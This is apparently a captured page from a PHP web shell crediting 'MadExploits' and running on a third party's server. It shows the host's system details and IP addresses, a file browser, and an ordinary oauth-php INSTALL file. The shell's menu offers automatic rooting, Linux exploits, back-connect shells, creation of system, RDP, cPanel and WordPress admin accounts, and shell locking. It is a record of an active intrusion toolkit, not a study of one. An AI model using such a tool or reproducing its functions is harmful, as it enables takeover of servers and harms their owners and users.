Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
oauth /
v1.0a /
server /
[ HOME SHELL ]
Name
Size
Permission
Action
cache
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
www
[ DIR ]
drwxr-xr-x
INSTALL
1.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : INSTALL
In this example I assume that oauth-php lives in /home/john/src/oauth-php 1) Create a virtual host and set the DB_DSN VARIABLE to the DSN of your (mysql) database. Example <VirtualHost *> ServerAdmin admin@localhost ServerName hello.local DocumentRoot /home/john/src/oauth-php/example/server/www UseCanonicalName Off ServerSignature On SetEnv DB_DSN mysql://foo:bar@localhost/oauth_example_server_db <Directory "home/john/src/oauth-php/example/server/www"> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny Allow from all <IfModule mod_php5.c> php_value magic_quotes_gpc 0 php_value register_globals 0 php_value session.auto_start 0 </IfModule> </Directory> </VirtualHost> 2) Create the database structure for the server: # mysql -u foo -p bar -h localhost < /home/john/src/oauth-php/library/store/mysql/mysql.sql 3) Download and install smarty into the smarty/core/smarty directory: # cd /home/john/src/oauth-php/example/server/core # wget 'http://www.smarty.net/do_download.php?download_file=Smarty-2.6.19.tar.gz' # tar zxf Smarty-2.6.19.tar.gz # mv Smarty-2.6.19 smarty 4) That's it! Point your browser to http://hello.local/ To get started. Arjan Scherpenisse <arjan@mediamatic.nl>, July 2008
Close